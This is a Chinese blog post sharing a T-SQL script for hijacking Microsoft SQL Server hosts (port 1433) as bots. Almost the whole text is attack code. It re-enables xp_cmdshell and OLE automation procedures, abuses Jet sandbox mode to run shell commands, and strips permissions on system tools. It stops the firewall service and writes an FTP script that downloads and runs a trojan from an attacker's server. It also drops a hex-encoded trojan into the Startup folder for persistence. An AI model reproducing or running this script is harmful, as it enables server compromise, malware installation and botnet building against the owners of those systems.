1433抓鸡源码

原创

firehalt 2012-03-07 18:33:01 博主文章分类：Web脚本 ©著作权

文章标签 return 1433 function procedure 抓鸡 文章分类 运维

©著作权归作者所有：来自51CTO博客作者firehalt的原创作品，请联系作者获取转载授权，否则将追究法律责任

use master
go

create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of function
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end

-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
go
set ANSI_NULLS off
set ANSI_WARNINGS off
go
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'Ad Hoc Distributed Queries', 1
GO
RECONFIGURE
GO

exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb70.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_dirtree,'xpstar70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar90.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_enumgroups,'xplog90.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar90.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_loginconfig,'xplog90.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar90.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar70.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar90.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole90.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole90.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole90.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole90.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar90.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar70.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar90.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar70.dll'
exec sp_addextendedproc xp_regread,'xpstar90.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar70.dll'
exec sp_addextendedproc xp_regwrite,'xpstar90.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar70.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar90.dll'

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xpweb70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go

dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go
dbcc addextendedproc ("xp_cmdshell","xpweb90.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole90.dll")
go

dbcc addextendedproc ("sp_oacreate","odsole90.dll")
dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
go

exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
go

exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
go

EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT

dbcc addextendedproc("xp_cmdshell","xpweb70.dll")
go
dbcc addextendedproc("xp_cmdshell", "xpsql70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql90.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
go

exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql90.dll'
go

exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb90.dll'
go

EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT

dbcc addextendedproc("xp_cmdshell","xpweb90.dll")
go
dbcc addextendedproc("xp_cmdshell", "xpsql90.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole90.dll")
dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe'
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls cmd.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls ftp.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls cacls.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls cacls.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls net1.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls cmd.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls ftp.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls cmd.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls ftp.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\cacls cmd.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\cacls ftp.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls net1.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("net1 stop alg")')
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [net1 stop alg]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls cmd.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls ftp.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls cacls.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls net1.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\icacls cmd.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\icacls ftp.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls cmd.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls ftp.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\cacls cmd.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\cacls ftp.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls net1.exe /e /g system::f]
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\dnary.mdb','select shell("net1 stop alg")')
go
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open FTP地址> cmd.txt&echo 账户>> cmd.txt&echo 密码>> cmd.txt&echo binary >> cmd.txt&echo get 木马.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&木马.exe&木马.exe&del cmd.txt /q /f&exit'--
go

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open FTP地址> cmd.txt&echo 账户>> cmd.txt&echo 密码>> cmd.txt&echo binary >> cmd.txt&echo get 木马.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&木马.exe&木马.exe&del cmd.txt /q /f&exit")')
go
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

go
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL,0x16进制马儿！！！！！在这里啊！煞B
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mppsql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\dx.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\Docume~1\alluse~1\Start~1\Programs\Startup\mssql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'c:\docume~1\alluse~1\「开始」菜单\程序\启动\mssql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\windows\system32\mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\windows\system32\cmd.exe/c mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\winnt\system32\cmd.exe/c mppsql.exe'--
go
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("mppsql.exe")')
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engine','SandBoxMode','REG_DWORD','0'
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\mppsql.exe")');
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engine','SandBoxMode','REG_DWORD','0'
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\winnt\system32\mppsql.exe")');
go
exec master..xp_cmdshell "c:\windows\system32\mppsql.exe"
go
exec master..xp_cmdshell "mppsql.exe"
go
exec master..xp_cmdshell "c:\winnt\system32\mppsql.exe"
go
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c mppsql.exe'
go
go
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("mppsql.exe")')
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("c:\windows\system32\mppsql.exe")')
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("c:\winnt\system32\mppsql.exe")')
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\mppsql.exe")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("c:\winnt\system32\mppsql.exe")');
go
exec sp_configure 'Ad Hoc Distributed Queries',0
reconfigure
exec sp_configure 'show advanced options',0
reconfigure